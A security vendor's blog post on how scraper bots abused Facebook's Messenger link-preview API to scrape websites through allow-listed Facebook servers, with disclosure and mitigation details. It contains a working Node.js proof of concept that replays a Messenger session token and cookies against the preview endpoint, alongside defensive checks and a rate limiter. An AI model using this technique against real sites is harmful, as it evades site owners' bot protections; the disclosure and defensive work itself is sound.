DataDome

How Facebook Was Used as a Proxy by Web Scraping Bots

The DataDome threat research team discovered in 2020 that bot operators were abusing Facebook’s link preview feature (Facebook Crawler) for web scraping purposes. In light of our more recent discovery that scraping is a gateway threat to more damaging attacks and fraudulent activity, it’s a good thing our team discovered the vulnerability and notified Facebook when we did.

When a link is shared on Facebook, Facebook crawls the shared webpage to extract information for the preview. By simulating link sharing, scraper bots were able to make unlimited requests to targeted websites via Facebook’s infrastructure. The issue was later remedied by rate limiting on the API.

The Facebook Crawler

The Facebook Crawler crawls the HTML of any page shared on Facebook or Messenger to fetch data—such as the page title, meta description, and thumbnail image—used to generate the preview. Since most website administrators want human users to see a well-curated preview whenever a link to their content is shared, they generally allow-list the Facebook Crawler’s user agent and/or IP addresses.

The Facebook crawler user agent strings are:

  • facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)

  • facebookexternalhit/1.1
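A user agent string alone is trivial to spoof, so allow-list rules usually pair it with an IP range check. The following is a minimal sketch of such a check, not any vendor's actual implementation. The function names are illustrative, it handles IPv4 only, and the CIDR range in the usage note is a placeholder from the reserved documentation address space, not a real Facebook range.

```javascript
// Convert a dotted-quad IPv4 address to an unsigned 32-bit integer.
function ipv4ToInt(ip) {
  const parts = ip.split('.');
  if (parts.length !== 4 || parts.some((p) => !/^\d{1,3}$/.test(p) || Number(p) > 255)) {
    throw new Error(`Invalid IPv4 address: ${ip}`);
  }
  const [a, b, c, d] = parts.map(Number);
  return ((a << 24) | (b << 16) | (c << 8) | d) >>> 0;
}

// Return true if `ip` falls inside the CIDR block, e.g. "192.0.2.0/24".
function ipInCidr(ip, cidr) {
  const [base, bitsText] = cidr.split('/');
  const bits = Number(bitsText);
  // A shift by 32 is a no-op in JavaScript, so /0 needs its own case.
  const mask = bits === 0 ? 0 : (0xffffffff << (32 - bits)) >>> 0;
  return ((ipv4ToInt(ip) & mask) >>> 0) === ((ipv4ToInt(base) & mask) >>> 0);
}

// Accept a request as crawler traffic only if both the user agent and the IP match.
function looksLikeFacebookCrawler(userAgent, ip, crawlerRanges) {
  return userAgent.startsWith('facebookexternalhit/') &&
    crawlerRanges.some((range) => ipInCidr(ip, range));
}
```

For example, `looksLikeFacebookCrawler('facebookexternalhit/1.1', '192.0.2.55', ['192.0.2.0/24'])` returns true with the placeholder range. Note that this check confirms only that a request comes from the crawler, not that a human triggered it, which is exactly the gap the abuse described in this article relied on.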

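The IP addresses change often, but the following command, which Facebook documents for its crawler, will generate an updated list of the IP addresses the Facebook Crawler uses:

  whois -h whois.radb.net -- '-i origin AS32934' | grep ^route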

How Scraper Bots Abused Facebook Infrastructure

A preview is the result of an API call: for Messenger, a standard POST request to https://www.messenger.com/message_share_attachment/fromURI/. Although the user’s browser makes the API call to Facebook’s servers, the requests that fetch data from the target HTML page are made by a Facebook server.

Because Facebook and Messenger are important traffic sources for many websites, they are usually allow-listed. Any requests they make will be processed.

Prior to late 2020, Facebook didn’t seem to have implemented strong protective measures (such as adaptive rate limiting) on the API used for link previews. As a result, scraper bots could extract large amounts of data from the websites they were interested in, disguised as Facebook. And because the requests are made by Facebook servers, scraper developers didn’t need to devote any resources of their own to support the bots.

To hijack the preview feature, all the bot operators needed to do was provide a token linked to a Facebook account. Hidden from the targeted websites’ bot protection systems by the allow-listed Facebook infrastructure, web scrapers could make thousands of requests per minute—which is exactly what many of them did.

Proof of Concept

In the following proof of concept, we use our own domain (datadome.co) to illustrate how Facebook’s link preview feature was being exploited for web crawling purposes.

Intended Use

To start, we posted a link to datadome.co in Messenger, which generated a call to the Messenger preview API.

[Image: link to datadome.co shared in Messenger]

The API call returns a response in the following form:

{
  "__ar": 1,
  "payload": {
    "description": "The #1 SaaS bot protection software for e-commerce and classifieds ads websites. Bot detection service with unmatched speed and accuracy. Deploy in minutes.",
    "media": {
      "image": "https://external.fcdg2-1.fna.fbcdn.net/safe_image.php?w=144&h=144&url=https%3A%2F%2Fdatadome.co%2Fwp-content%2Fuploads%2Ffeatured-image.jpg&cfs=1&_nc_cb=1&_nc_hash=AQDeaYZwULAow7if",
      "image_size": {
        "height": 144,
        "width": 144
      }
    },
    "source": "datadome.co",
    "style_list": [
      "share",
      "fallback"
    ],
    "target": null,
    "title": "DataDome – Real-Time Bot Protection, Detection and Mitigation Solution",
    "uri": "https://datadome.co/?attachment_canonical_url=https%3A%2F%2Fdatadome.co%2F&attachment_user_url=https%3A%2F%2Fdatadome.co%2F",
    "share_data": {
      "share_type": 100,
      "share_params": {
        "urlInfo": {
          "canonical": "https://datadome.co/",
          "final": "https://datadome.co/",
          "user": "https://datadome.co/",
          "log": {
            "1496675180": "https://datadome.co/",
            "1497042740": "https://datadome.co/",
            "1498595300": "https://datadome.co/"
          }
        },
        "favicon": "https://datadome.co/wp-content/uploads/2018/07/favicon_datadome.png",
        "iframe": [],
        "title": "DataDome – Real-Time Bot Protection, Detection and Mitigation Solution",
        "summary": "The #1 SaaS bot protection software for e-commerce and classifieds ads websites. Bot detection service with unmatched speed and accuracy. Deploy in minutes.",
        "images_sorted_by_dom": [],
        "ranked_images": {
          "images": [
            "https://datadome.co/wp-content/uploads/featured-image.jpg"
          ],
          "ranking_model_version": 11,
          "specified_og": true
        },
        "medium": 104,
        "url": "https://datadome.co/",
        "global_share_id": 496414423817034,
        "video": [],
        "music": [],
        "asset_3d_infos": [],
        "extra": {
          "src": "",
          "title": "",
          "artist": "",
          "album": "",
          "type": ""
        },
        "amp_url": "",
        "url_scrape_id": "769383043882885",
        "hmac": "Abcp_zLZhl6YJGflTqQ",
        "locale": null,
        "external_img": "{\"src\":\"https:\\/\\/datadome.co\\/wp-content\\/uploads\\/featured-image.jpg\",\"width\":1200,\"height\":627}"
      }
    }
  },
  "hsrp": {
    "hblp": {
      "sr_revision": 1002782683,
      "consistency": {
        "rev": 1002782683
      }
    }
  },
  "lid": "6880779922294620033"
}

Although the response doesn’t include all webpage content, for many websites it contains important data, such as:
  • Product Name
  • Product Description
  • Price
  • Average Rating

All of these are potentially very valuable to scrapers.
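To make concrete how little post-processing the response needs, here is a minimal sketch that pulls the preview fields out of a response shaped like the one above. The function name `summarizePreview` and the choice of fields are illustrative. The field paths are taken from the sample response only and may not hold for every page.

```javascript
// Extract the human-visible preview fields from a parsed preview API response.
// Missing fields are returned as null rather than throwing.
function summarizePreview(response) {
  const payload = response.payload || {};
  const urlInfo = payload.share_data?.share_params?.urlInfo || {};
  return {
    title: payload.title ?? null,
    description: payload.description ?? null,
    source: payload.source ?? null,
    canonicalUrl: urlInfo.canonical ?? null,
    thumbnail: payload.media?.image ?? null,
  };
}
```

On a product page, the title and description fields are where details such as the product name or price would typically appear, since they mirror the metadata the site publishes for previews.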

Looking at the logs of the DataDome website, we could see that the IP address that requested our page after the API call above was classified as belonging to the FACEBOOK autonomous system (AS). The user agent was the one the Facebook Crawler uses for link previews, and the reverse DNS of the IP address also showed that it belonged to Facebook.
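A reverse DNS check of this kind is usually paired with a forward lookup so that a forged PTR record cannot pass. The sketch below shows that forward-confirmed reverse DNS pattern using Node's built-in DNS promises API. The function name and the `allowedSuffixes` parameter are assumptions for illustration: the hostname suffixes to trust are not listed in this article and must come from your own verified observations. It covers IPv4 only.

```javascript
const dns = require('node:dns').promises;

// Forward-confirmed reverse DNS:
// 1. resolve the IP to hostnames (PTR lookup),
// 2. keep only hostnames ending in a trusted suffix,
// 3. resolve each hostname back to IPv4 addresses and require the original IP.
// `resolver` defaults to Node's DNS API and can be swapped out for testing.
async function isForwardConfirmed(ip, allowedSuffixes, resolver = dns) {
  let hostnames;
  try {
    hostnames = await resolver.reverse(ip);
  } catch {
    return false; // no PTR record, or the lookup failed
  }
  for (const hostname of hostnames) {
    const name = hostname.toLowerCase();
    if (!allowedSuffixes.some((suffix) => name.endsWith(suffix))) continue;
    try {
      const addresses = await resolver.resolve4(name);
      if (addresses.includes(ip)) return true;
    } catch {
      // forward lookup failed for this hostname; try the next one
    }
  }
  return false;
}
```

As with the IP range check, a positive result proves only that the request came from the named network. It says nothing about who asked that network to make the request.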

Malicious Use by Scraper Bots

Let’s now simulate a scraping attack, using Node.js to make requests to the Messenger preview API endpoint.

The code below shows how the preview feature could be exploited. The file credentials.json contains the secrets (i.e., the authentication token and session cookies, hidden here for obvious reasons).

When a request is made, pretending to share a link, Messenger returns a JSON document containing information about the page (here stored in the resultParsed variable).

const https = require('https');
// credentials.json holds the secrets: the fb_dtsg token, the c_user and xs cookies, and the account name.
const config = require('./credentials.json');

// Asks the Messenger preview API to "share" a URL and resolves with the parsed JSON response.
function requestUrlFacebook(url) {
  return new Promise((resolve, reject) => {
    const data = `image_height=144&image_width=144&uri=${encodeURIComponent(url)}&__a=1&__csr=&__req=1z&__beoa=0&__pc=PHASED%3Amessengerdotcom_pkg&__comet_req=0&fb_dtsg=${config.fb_dtsg}`;
    const options = {
      hostname: 'www.messenger.com',
      path: '/message_share_attachment/fromURI/',
      method: 'POST',
      headers: {
        'accept': '*/*',
        'authority': 'www.messenger.com',
        'origin': 'https://www.messenger.com',
        'accept-language': 'en-GB,en;q=0.9',
        'cache-control': 'no-cache',
        'content-type': 'application/x-www-form-urlencoded',
        // Use the byte length, not the string length, for the request body.
        'content-length': Buffer.byteLength(data),
        'pragma': 'no-cache',
        'sec-fetch-dest': 'empty',
        'sec-fetch-mode': 'cors',
        'sec-fetch-site': 'same-origin',
        'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36',
        'referer': `https://www.messenger.com/t/${config.accountName}`,
        'cookie': `c_user=${config.c_user}; xs=${config.xs}; wd=1201x946`
      }
    };

    const req = https.request(options, (res) => {
      let body = '';
      res.on('data', (chunk) => {
        body += chunk;
      });

      res.on('end', () => {
        try {
          // The response body is prefixed with "for (;;);", which must be stripped before parsing.
          const resultParsed = JSON.parse(body.replace('for (;;);', ''));
          resolve(resultParsed);
        } catch (err) {
          reject(err);
        }
      });
    });

    // Reject on network errors so the caller is not left waiting forever.
    req.on('error', reject);

    req.write(data);
    req.end();
  });
}

(async () => {
  const content = await requestUrlFacebook('https://datadome.co');
  console.log(content);
  // {
  //   __ar: 1,
  //   payload:
  //   {
  //     description:
  //       'The #1 SaaS bot protection software for e-commerce and classifieds ads websites. Bot detection service with unmatched speed and accuracy. Deploy in minutes.',
  //     media:
  //     {
  //       image:
  //         'https://external.fcdg2-1.fna.fbcdn.net/safe_image.php?d=AQCWUlNeWLZPsTtv&w=144&h=144&url=https%3A%2F%2Fdatadome.co%2Fwp-content%2Fuploads%2Ffeatured-image.jpg&cfs=1&_nc_cb=1&_nc_hash=AQDYnd48bPKvFNkQ',
  //       image_size: [Object]
  //     },
  //     source: 'datadome.co',
  //     style_list: ['share', 'fallback'],
  //     target: null,
  //     title:
  //       'DataDome – Real-Time Bot Protection, Detection and Mitigation Solution',
  //     uri:
  //       'https://datadome.co/?attachment_canonical_url=https%3A%2F%2Fdatadome.co%2F&attachment_user_url=https%3A%2F%2Fdatadome.co%2F',
  //     share_data: { share_type: 100, share_params: [Object] }
  //   },
  //   hsrp: { hblp: { sr_revision: 1002782683, consistency: [Object] } },
  //   lid: '6880792885017226207'
  // }
})().catch((err) => console.error('Error:', err.message));

Notably, the requester may be able to test the presence or availability of a product, which is critical information for the operators of sneaker bots and other kinds of scalper bots.

Discovery, Mitigation, and Remediation

Our R&D team first discovered the abuse of Facebook’s infrastructure on the website of a long-term DataDome customer, the #1 classified ads website in its country by a wide margin. Due to its popularity, the website is constantly targeted by scraper bots trying to extract listing data, so it required additional protection from the bot threats specific to the classified ads industry. Scraper operators had discovered the loophole in Facebook’s API that enabled them to make unlimited requests to the website.

With technical detection only, the fraudulent requests would have been indistinguishable from legitimate API calls, since they had the Facebook user agent and IP address. However, our heuristic analysis uncovered that certain parameters, unlikely to be used by humans, were overrepresented in the URLs that Facebook requested. Certain use cases were also unlikely: for example, a human user would typically share a link to a specific ad, not to a page of search results.
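The kind of heuristic described above can be sketched as a simple ratio over the URLs requested by the crawler. This is an illustration only, not DataDome's detection logic. The parameter names, the `/search` path prefix, and the function names are hypothetical and would need to be adapted to the site being protected.

```javascript
// Hypothetical signals: query parameters a human rarely shares, and the
// path under which this imaginary site serves search results.
const SUSPICIOUS_PARAMS = ['page', 'sort', 'offset'];
const SEARCH_PATH_PREFIX = '/search';

// True if the URL looks like something a person would be unlikely to share.
function isUnlikelyShare(rawUrl) {
  const url = new URL(rawUrl);
  const hasSuspiciousParam = SUSPICIOUS_PARAMS.some((name) => url.searchParams.has(name));
  return url.pathname.startsWith(SEARCH_PATH_PREFIX) || hasSuspiciousParam;
}

// Share of crawler-requested URLs that look like unlikely shares (0 to 1).
function unlikelyShareRatio(crawlerUrls) {
  if (crawlerUrls.length === 0) return 0;
  const flagged = crawlerUrls.filter(isUnlikelyShare).length;
  return flagged / crawlerUrls.length;
}
```

A ratio far above the site's normal baseline for crawler traffic would be a reason to look more closely. The threshold itself has to be learned from legitimate traffic, since some users do share search result pages.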

We found evidence of similar abuse on other customer sites. And finally, our own (responsible) tests confirmed that we could easily make more than 10,000 requests per minute to a website, using a single Facebook account. While we were able to mitigate the issue for our own customers, we concluded that there was significant potential for abuse, and we notified Facebook. Facebook has since improved rate limiting on the Messenger preview API. As our tests (and hacker forum discussions) confirmed, the improvements were able to effectively prevent continued abuse of the preview feature for scraping purposes.
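The details of Facebook’s fix are not given here. As a generic illustration of per-account rate limiting, the sketch below implements a basic sliding-window limiter. The class name, the limits, and the account key are all hypothetical and chosen only for the example.

```javascript
// Sliding-window rate limiter: allows at most `maxRequests` per `windowMs`
// for each key (for example, an account identifier).
class SlidingWindowLimiter {
  constructor(maxRequests, windowMs) {
    this.maxRequests = maxRequests;
    this.windowMs = windowMs;
    this.timestamps = new Map(); // key -> times (ms) of recently allowed requests
  }

  // Returns true if the request is allowed. `now` is injectable for testing.
  allow(key, now = Date.now()) {
    // Drop timestamps that have fallen out of the window.
    const recent = (this.timestamps.get(key) || []).filter((t) => now - t < this.windowMs);
    const allowed = recent.length < this.maxRequests;
    if (allowed) recent.push(now);
    this.timestamps.set(key, recent);
    return allowed;
  }
}
```

With `new SlidingWindowLimiter(60, 60000)`, a single account could trigger at most 60 previews per minute, far below the request rates observed in the tests described above. An adaptive limiter would go further and adjust the limit based on observed behavior.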

To see what malicious bots and online fraud attacks are targeting your website, mobile app, and/or API in real time, check out DataDome’s free trial.
